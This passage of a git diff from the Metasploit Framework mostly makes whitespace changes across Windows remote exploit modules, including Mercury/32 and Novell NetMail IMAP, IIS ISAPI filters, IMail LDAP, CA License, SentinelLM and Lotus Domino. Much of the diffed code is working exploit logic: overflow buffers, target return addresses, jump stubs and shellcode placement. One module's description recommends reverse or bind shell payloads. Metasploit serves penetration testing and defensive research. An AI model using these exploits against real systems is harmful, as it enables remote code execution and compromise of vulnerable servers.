file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Mercury/32 v4.01a IMAP RENAME Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow vulnerability in the + This module exploits a stack overflow vulnerability in the Mercury/32 v.4.01a IMAP service. }, 'Author' => [ 'MC' ], @@ -34,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '12508'], [ 'BID', '11775'], [ 'NSS', '15867'], - ], 'Privileged' => true, 'DefaultOptions' => @@ -46,10 +43,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 500, 'BadChars' => "\x00\x0a\x0d\x20", 'StackAdjustment' => -3500, - }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows 2000 SP4 English', { 'Ret' => 0x7846107b }], ['Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0 }], @@ -73,10 +69,10 @@ class Metasploit3 < Msf::Exploit::Remote connect_login sploit = "a001 RENAME " + rand_text_alpha_upper(260) - sploit << [target.ret].pack('V') + payload.encoded + sploit << [target.ret].pack('V') + payload.encoded sock.put(sploit) - + handler disconnect end diff --git a/modules/exploits/windows/imap/novell_netmail_append.rb b/modules/exploits/windows/imap/novell_netmail_append.rb index 856e89f163..de6ba3fbff 100644 --- a/modules/exploits/windows/imap/novell_netmail_append.rb +++ b/modules/exploits/windows/imap/novell_netmail_append.rb @@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Novell's Netmail 3.52 IMAP APPEND - verb. By sending an overly long string, an attacker can overwrite the - buffer and control program execution. + This module exploits a stack overflow in Novell's Netmail 3.52 IMAP APPEND + verb. By sending an overly long string, an attacker can overwrite the + buffer and control program execution. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -48,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 }], ], @@ -56,22 +54,22 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Dec 23 2006')) end - + def exploit - sploit = "a002 APPEND " + "saved-messages (\Seen) " + sploit = "a002 APPEND " + "saved-messages (\Seen) " sploit << rand_text_english(1358) + payload.encoded + "\xeb\x06" - sploit << rand_text_english(2) + [target.ret].pack('V') + sploit << rand_text_english(2) + [target.ret].pack('V') sploit << [0xe9, -585].pack('CV') + rand_text_english(150) - info = connect_login - + info = connect_login + if (info == true) print_status("Trying target #{target.name}...") sock.put(sploit + "\r\n") else - print_status("Not falling through with exploit") + print_status("Not falling through with exploit") end - + handler disconnect end diff --git a/modules/exploits/windows/imap/novell_netmail_auth.rb b/modules/exploits/windows/imap/novell_netmail_auth.rb index c4344ea56f..a6b8662b37 100644 --- a/modules/exploits/windows/imap/novell_netmail_auth.rb +++ b/modules/exploits/windows/imap/novell_netmail_auth.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,13 +17,13 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Novell NetMail <=3.52d IMAP AUTHENTICATE Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE + This module exploits a stack overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE GSSAPI command. By sending an overly long string, an attacker can overwrite the buffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp - or windows/shell_reverse_tcp allows for the most reliable results. + or windows/shell_reverse_tcp allows for the most reliable results. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -37,23 +37,23 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - }, + }, 'Payload' => { 'Space' => 850, 'BadChars' => "\x00\x20\x2c\x3a\x40", 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", - 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, + 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 } ], ], 'DisclosureDate' => 'Jan 7 2007', 'DefaultTarget' => 0)) - register_options( [ Opt::RPORT(143) ], self.class ) + register_options( [ Opt::RPORT(143) ], self.class ) end def exploit @@ -66,9 +66,9 @@ class Metasploit3 < Msf::Exploit::Remote sploit = "A001 AUTHENTICATE GSSAPI\r\n" sploit << rand_text_alpha_upper(1258) + payload.encoded + "\xeb\x06" - sploit << rand_text_alpha_upper(2) + [target.ret].pack('V') + sploit << rand_text_alpha_upper(2) + [target.ret].pack('V') sploit << make_nops(8) + jmp + rand_text_alpha_upper(700) - + print_status("Trying target #{target.name}...") sock.put(sploit + "\r\n" + "A002 LOGOUT\r\n") diff --git a/modules/exploits/windows/imap/novell_netmail_status.rb b/modules/exploits/windows/imap/novell_netmail_status.rb index 0eb6181b23..218a04f7c9 100644 --- a/modules/exploits/windows/imap/novell_netmail_status.rb +++ b/modules/exploits/windows/imap/novell_netmail_status.rb @@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Novell's Netmail 3.52 IMAP STATUS - verb. By sending an overly long string, an attacker can overwrite the - buffer and control program execution. + This module exploits a stack overflow in Novell's Netmail 3.52 IMAP STATUS + verb. By sending an overly long string, an attacker can overwrite the + buffer and control program execution. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -47,29 +45,29 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - ['Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 }], + ['Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 }], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 18 2005')) end - - def exploit - sploit = "a002 STATUS " + rand_text_english(1602) + payload.encoded - sploit << "\xeb\x06" + rand_text_english(2) + [target.ret].pack('V') - sploit << [0xe8, -485].pack('CV') + rand_text_english(150) + " inbox" - info = connect_login - + def exploit + sploit = "a002 STATUS " + rand_text_english(1602) + payload.encoded + sploit << "\xeb\x06" + rand_text_english(2) + [target.ret].pack('V') + sploit << [0xe8, -485].pack('CV') + rand_text_english(150) + " inbox" + + info = connect_login + if (info == true) print_status("Trying target #{target.name}...") sock.put(sploit + "\r\n") else - print_status("Not falling through with exploit") + print_status("Not falling through with exploit") end - + handler disconnect end diff --git a/modules/exploits/windows/imap/novell_netmail_subscribe.rb b/modules/exploits/windows/imap/novell_netmail_subscribe.rb index 17807fe12c..f62ea45fd8 100644 --- a/modules/exploits/windows/imap/novell_netmail_subscribe.rb +++ b/modules/exploits/windows/imap/novell_netmail_subscribe.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Novell's NetMail 3.52 IMAP SUBSCRIBE + This module exploits a stack overflow in Novell's NetMail 3.52 IMAP SUBSCRIBE verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution. }, @@ -48,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 }], ], @@ -56,12 +54,12 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Dec 23 2006')) end - + def exploit - sploit = "a002 SUBSCRIBE #" + rand_text_english(1602) + payload.encoded - sploit << "\xeb\x06" + rand_text_english(2) + [target.ret].pack('V') - sploit << [0xe8, -485].pack('CV') + rand_text_english(150) - + sploit = "a002 SUBSCRIBE #" + rand_text_english(1602) + payload.encoded + sploit << "\xeb\x06" + rand_text_english(2) + [target.ret].pack('V') + sploit << [0xe8, -485].pack('CV') + rand_text_english(150) + info = connect_login if (info == true) @@ -70,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote else print_status("Not falling through with exploit") end - + handler disconnect end diff --git a/modules/exploits/windows/isapi/fp30reg_chunked.rb b/modules/exploits/windows/isapi/fp30reg_chunked.rb index db8e839311..7199b1c442 100644 --- a/modules/exploits/windows/isapi/fp30reg_chunked.rb +++ b/modules/exploits/windows/isapi/fp30reg_chunked.rb @@ -3,31 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow', 'Description' => %q{ - This is an exploit for the chunked encoding buffer overflow + This is an exploit for the chunked encoding buffer overflow described in MS03-051 and originally reported by Brett Moore. This particular modules works against versions of Windows 2000 between SP0 and SP3. Service Pack 4 fixes the issue. - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -48,48 +45,48 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows 2000 SP0-SP3', { 'Ret' => 0x6c38a4d0 }], # from mfc42.dll ['Windows 2000 07/22/02', { 'Ret' => 0x67d44eb1 }], # from fp30reg.dll 07/22/2002 - ['Windows 2000 10/06/99', { 'Ret' => 0x67d4665d }], # from fp30reg.dll 10/06/1999 + ['Windows 2000 10/06/99', { 'Ret' => 0x67d4665d }], # from fp30reg.dll 10/06/1999 ], 'DisclosureDate' => 'Nov 11 2003', 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('URL', [ true, "The path to fp30reg.dll", "/_vti_bin/_vti_aut/fp30reg.dll" ]), - ], self.class) + + register_options( + [ + OptString.new('URL', [ true, "The path to fp30reg.dll", "/_vti_bin/_vti_aut/fp30reg.dll" ]), + ], self.class) end def exploit - + print_status("Creating overflow request for fp30reg.dll...") - + pat = rand_text_alphanumeric(0xdead) pat[128, 4] = [target.ret].pack('V') pat[264, 4] = [target.ret].pack('V') # sub eax,0xfffffeff; jmp eax pat[160, 7] = "\x2d\xff\xfe\xff\xff" + "\xff\xe0" - + pat[280, 512] = make_nops(512) pat[792, payload.encoded.length] = payload.encoded - + 0.upto(15) do |i| - + if (i % 3 == 0) print_status("Refreshing the remote dllhost.exe process...") - + res = send_request_raw({ 'uri' => datastore['URL'] }, -1) - + if (res and res.body =~ /specified module could not be found/) print_status("The server states that #{datastore['URL']} does not exist.\n") return - end + end end print_status("Trying to exploit fp30reg.dll (request #{i} of 15)") @@ -110,17 +107,17 @@ class Metasploit3 < Msf::Exploit::Remote end handler - + sleep(1) end end - + def check print_status("Requesting the vulnerable ISAPI path...") r = send_request_raw({ 'uri' => datastore['URL'] - }, -1) - + }, -1) + if (r and r.code == 501) return Exploit::CheckCode::Detected end diff --git a/modules/exploits/windows/isapi/ms00_094_pbserver.rb b/modules/exploits/windows/isapi/ms00_094_pbserver.rb index a3c3c1d40b..9df5c3605f 100644 --- a/modules/exploits/windows/isapi/ms00_094_pbserver.rb +++ b/modules/exploits/windows/isapi/ms00_094_pbserver.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft IIS Phone Book Service Overflow', 'Description' => %q{ - This is an exploit for the Phone Book Service /pbserver/pbserver.dll + This is an exploit for the Phone Book Service /pbserver/pbserver.dll described in MS00-094. By sending an overly long URL argument for phone book updates, it is possible to overwrite the stack. This module has only been tested against Windows 2000 SP1. @@ -58,17 +56,17 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Dec 04 2000', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('URL', [ true, "The path to pbserver.dll", "/pbserver/pbserver.dll" ]), - ], self.class) + register_options( + [ + OptString.new('URL', [ true, "The path to pbserver.dll", "/pbserver/pbserver.dll" ]), + ], self.class) end def check print_status("Requesting the vulnerable ISAPI path...") res = send_request_raw({ 'uri' => datastore['URL'] - }, 5) + }, 5) if (res and res.code == 400) return Exploit::CheckCode::Vulnerable diff --git a/modules/exploits/windows/isapi/nsiislog_post.rb b/modules/exploits/windows/isapi/nsiislog_post.rb index 3f24c1decf..a6088aa34d 100644 --- a/modules/exploits/windows/isapi/nsiislog_post.rb +++ b/modules/exploits/windows/isapi/nsiislog_post.rb @@ -3,33 +3,29 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking - include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::BruteTargets include Msf::Exploit::Remote::Seh - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow', 'Description' => %q{ - This exploits a buffer overflow found in the nsiislog.dll + This exploits a buffer overflow found in the nsiislog.dll ISAPI filter that comes with Windows Media Server. This module will also work against the 'patched' MS03-019 version. This vulnerability was addressed by MS03-022. - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -41,7 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'BID', '8035'], [ 'MSB', 'MS03-022'], [ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'], - ], 'Privileged' => false, 'Payload' => @@ -52,14 +47,14 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # SEH offsets by version (Windows 2000) # 4.1.0.3917 = 9992 # 4.1.0.3920 = 9992 - # 4.1.0.3927 = 9992 + # 4.1.0.3927 = 9992 # 4.1.0.3931 = 14092 - + ['Brute Force', { }], ['Windows 2000 -MS03-019', { 'Rets' => [ 9988, 0x40f01333 ] }], ['Windows 2000 +MS03-019', { 'Rets' => [ 14088, 0x40f01353 ] }], @@ -67,24 +62,24 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Jun 25 2003', 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('URL', [ true, "The path to nsiislog.dll", "/scripts/nsiislog.dll" ]), - ], self.class) + + register_options( + [ + OptString.new('URL', [ true, "The path to nsiislog.dll", "/scripts/nsiislog.dll" ]), + ], self.class) end - + def check res = send_request_raw({ 'uri' => datastore['URL'] }, -1) - + if (res and res.body =~ /NetShow ISAPI/) return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end - + def exploit_target(target) # Create a buffer greater than max SEH offset (16384) @@ -105,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) sleep(1) - + handler disconnect end diff --git a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb index e96b80513f..6f39490109 100644 --- a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb +++ b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,16 +18,16 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Seh - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft IIS ISAPI RSA WebAgent Redirect Overflow', 'Description' => %q{ This module exploits a stack overflow in the SecurID Web Agent for IIS. This ISAPI filter runs in-process with inetinfo.exe, any attempt to exploit this flaw will result in the termination and potential restart of the IIS service. - + }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # Version-specific return addresses ['RSA WebAgent 5.2', { 'Rets' => [ 996, 0x1001e694 ] }], @@ -67,36 +67,36 @@ class Metasploit3 < Msf::Exploit::Remote ['RSA WebAgent 5.3 on Windows 2003 English SP0', { 'Rets' => [ 992, 0x7ffc0638 ] }], ], 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('URL', [ true, "The path to IISWebAgentIF.dll", "/WebID/IISWebAgentIF.dll" ]), - ], self.class) + + register_options( + [ + OptString.new('URL', [ true, "The path to IISWebAgentIF.dll", "/WebID/IISWebAgentIF.dll" ]), + ], self.class) end - + def check r = send_request_raw({ 'uri' => datastore['URL'], 'query' => 'GetPic?image=msf' }, -1) - - if (r and r.body and r.body =~ /RSA Web Access Authentication/) + + if (r and r.body and r.body =~ /RSA Web Access Authentication/) return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end - + def exploit pat = rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A') # HACK seh = generate_seh_payload(target['Rets'][1]) pat[target['Rets'][0]-4, seh.length] = seh - + r = send_request_raw({ 'uri' => datastore['URL'], 'query' => 'Redirect?url=' + pat }, 5) - + handler disconnect end diff --git a/modules/exploits/windows/ldap/imail_thc.rb b/modules/exploits/windows/ldap/imail_thc.rb index ea2f4f3ca6..4a14a8b1b2 100644 --- a/modules/exploits/windows/ldap/imail_thc.rb +++ b/modules/exploits/windows/ldap/imail_thc.rb @@ -3,29 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'IMail LDAP Service Buffer Overflow', 'Description' => %q{ - This exploits a buffer overflow in the LDAP service that is + This exploits a buffer overflow in the LDAP service that is part of the IMail product. This module was tested against version 7.10 and 8.5, both running on Windows 2000. - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -36,48 +33,45 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '3984'], [ 'BID', '9682'], [ 'URL', 'http://secunia.com/advisories/10880/'], - ], 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x0a\x0d\x20", - }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - ["Windows 2000 English", { 'Ret' => 0x75023386 }], ["Windows 2000 IMail 8.x", { 'Ret' => 0x1002a619 }], ], 'DisclosureDate' => 'Feb 17 2004', 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(389) - ], self.class) + + register_options( + [ + Opt::RPORT(389) + ], self.class) end def exploit connect - + buf = "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20" buf << "\xcc" * 5000 - + # Universal exploit, targets 6.x, 7.x, and 8.x at once ;) - # Thanks for johnny cyberpunk for 6/7 vs 8 diffs - + # Thanks for johnny cyberpunk for 6/7 vs 8 diffs + buf[77, 4] = "\xeb\x06" buf[81, 4] = [target.ret].pack('V') # 6.x, 7.x buf[85, 4] = "\xeb\x06" buf[89, 4] = [target.ret].pack('V') # 8.x buf[93, payload.encoded.length] = payload.encoded - + sock.put(buf) - + handler disconnect end diff --git a/modules/exploits/windows/license/calicclnt_getconfig.rb b/modules/exploits/windows/license/calicclnt_getconfig.rb index 0d2be06afa..21f9f32626 100644 --- a/modules/exploits/windows/license/calicclnt_getconfig.rb +++ b/modules/exploits/windows/license/calicclnt_getconfig.rb @@ -3,13 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' class Metasploit3 < Msf::Exploit::Remote @@ -18,11 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Computer Associates License Client GETCONFIG Overflow', 'Description' => %q{ - This module exploits an vulnerability in the CA License Client - service. This exploit will only work if your IP address can be + This module exploits an vulnerability in the CA License Client + service. This exploit will only work if your IP address can be resolved from the target system point of view. This can be accomplished on a local network by running the 'nmbd' service that comes with Samba. If you are running this exploit from @@ -74,13 +73,13 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Mar 02 2005')) - register_options( - [ - Opt::RPORT(10203), - OptPort.new('SRVPORT', [ true, "Fake CA License Server Port", 10202 ]), - ], self.class) + register_options( + [ + Opt::RPORT(10203), + OptPort.new('SRVPORT', [ true, "Fake CA License Server Port", 10202 ]), + ], self.class) end - + #def check # It is possible to check, but due to a software bug, checking prevents exploitation #end @@ -112,14 +111,14 @@ class Metasploit3 < Msf::Exploit::Remote req = session.recvfrom(2000)[0] next if not req next if req.empty? - + if (req =~ /OS\<([^\>]+)/) print_status("Target reports OS: #{$1}") end # exploits two different versions at once >:-) # 144 -> return address of esi points to string middle - # 196 -> return address of edi points to string beginning + # 196 -> return address of edi points to string beginning # 148 -> avoid exception by patching with writable address # 928 -> seh handler (not useful under XP SP2) buff = rand_text_alphanumeric(900) diff --git a/modules/exploits/windows/license/calicserv_getconfig.rb b/modules/exploits/windows/license/calicserv_getconfig.rb index 429d43061f..dde0d21d08 100644 --- a/modules/exploits/windows/license/calicserv_getconfig.rb +++ b/modules/exploits/windows/license/calicserv_getconfig.rb @@ -3,13 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' class Metasploit3 < Msf::Exploit::Remote @@ -18,10 +17,10 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Computer Associates License Server GETCONFIG Overflow', 'Description' => %q{ - This module exploits an vulnerability in the CA License Server + This module exploits an vulnerability in the CA License Server network service. By sending an excessively long GETCONFIG packet the stack may be overwritten. }, @@ -67,12 +66,12 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Mar 02 2005')) - register_options( - [ - Opt::RPORT(10202), - ], self.class) + register_options( + [ + Opt::RPORT(10202), + ], self.class) end - + def check connect banner = sock.get_once @@ -95,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote # exploits two different versions at once >:-) # 144 -> return address of esi points to string middle - # 196 -> return address of edi points to string beginning + # 196 -> return address of edi points to string beginning # 148 -> avoid exception by patching with writable address # 928 -> seh handler (not useful under XP SP2) buff = rand_text_alphanumeric(900) @@ -108,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit = "A0 GETCONFIG SELF #{buff}<EOM>" sock.put(sploit) - + handler disconnect end diff --git a/modules/exploits/windows/license/sentinel_lm7_udp.rb b/modules/exploits/windows/license/sentinel_lm7_udp.rb index bf847c4d4b..c67f081dcb 100644 --- a/modules/exploits/windows/license/sentinel_lm7_udp.rb +++ b/modules/exploits/windows/license/sentinel_lm7_udp.rb @@ -3,31 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'SentinelLM UDP Buffer Overflow', 'Description' => %q{ - This module exploits a simple stack overflow in the Sentinel + This module exploits a simple stack overflow in the Sentinel License Manager. The SentinelLM service is installed with a wide selection of products and seems particular popular with academic products. If the wrong target value is selected, the service will crash and not restart. - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -37,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2005-0353'], [ 'OSVDB', '14605'], [ 'BID', '12742'], - ], 'Privileged' => true, 'DefaultOptions' => @@ -49,10 +45,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 800, 'BadChars' => "\x00\x20", 'StackAdjustment' => -3500, - }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['SentinelLM 7.2.0.0 Windows NT 4.0 SP4/SP5/SP6', { 'Ret' => 0x77681799 }], # ws2help.dll ['SentinelLM 7.2.0.0 Windows 2000 English', { 'Ret' => 0x75022ac4 }], # ws2help.dll @@ -61,19 +56,19 @@ class Metasploit3 < Msf::Exploit::Remote ['SentinelLM 7.2.0.0 Windows 2003 English SP0', { 'Ret' => 0x7ffc0638 }], # peb ], 'DisclosureDate' => 'Mar 07 2005' )) - - register_options( - [ - Opt::RPORT(5093) - ], self.class) + + register_options( + [ + Opt::RPORT(5093) + ], self.class) end - + def check connect_udp udp_sock.put("\x7a\x00\x00\x00\x00\x00") res = udp_sock.recvfrom(8192) disconnect_udp - + if (res and res[0] == 0x7a) return Exploit::CheckCode::Detected end @@ -82,22 +77,22 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect_udp - + # Payload goes first buf = payload.encoded + rand_text_english(2048-payload.encoded.length) - + # Return to a pop/pop/ret via SEH buf[836, 4] = [target.ret].pack('V') - + # The pop/pop/ret takes us here, jump back 5 bytes buf[832, 2] = "\xeb\xf9" - + # Now jump all the way back to our shellcode buf[827, 5] = "\xe9" + [-829].pack('V') - + udp_sock.put(buf) udp_sock.recvfrom(8192) - + handler disconnect_udp end diff --git a/modules/exploits/windows/lotus/domino_http_accept_language.rb b/modules/exploits/windows/lotus/domino_http_accept_language.rb index 412f972152..e44533386c 100644 --- a/modules/exploits/windows/lotus/domino_http_accept_language.rb +++ b/modules/exploits/windows/lotus/domino_http_accept_language.rb @@ -3,13 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## - require 'msf/core' class Metasploit3 < Msf::Exploit::Remote @@ -21,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'IBM Lotus Domino Web Server Accept-Language Stack Overflow', 'Description' => %q{ - This module exploits a stack overflow in IBM Lotus Domino Web Server + This module exploits a stack overflow in IBM Lotus Domino Web Server prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP request with an Accept-Language header greater than 114 bytes. }, @@ -42,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => true, 'Payload' => { - 'Space' => 800, + 'Space' => 800, 'BadChars' => "\x00\x0a\x20\x2c\x3b", 'StackAdjustment' => -3500, }, @@ -110,8 +109,8 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'May 20 2008')) - - register_options( [ Opt::RPORT(80) ], self.class ) + + register_options( [ Opt::RPORT(80) ], self.class ) end def exploit @@ -119,24 +118,24 @@ class Metasploit3 < Msf::Exploit::Remote lang = rand_text_alphanumeric(116) # greetz to hateful chris lang[ 56, 4 ] = [ 0xfffffffe ].pack('V') # Fix Second crash (esi) - lang[ 68, 4 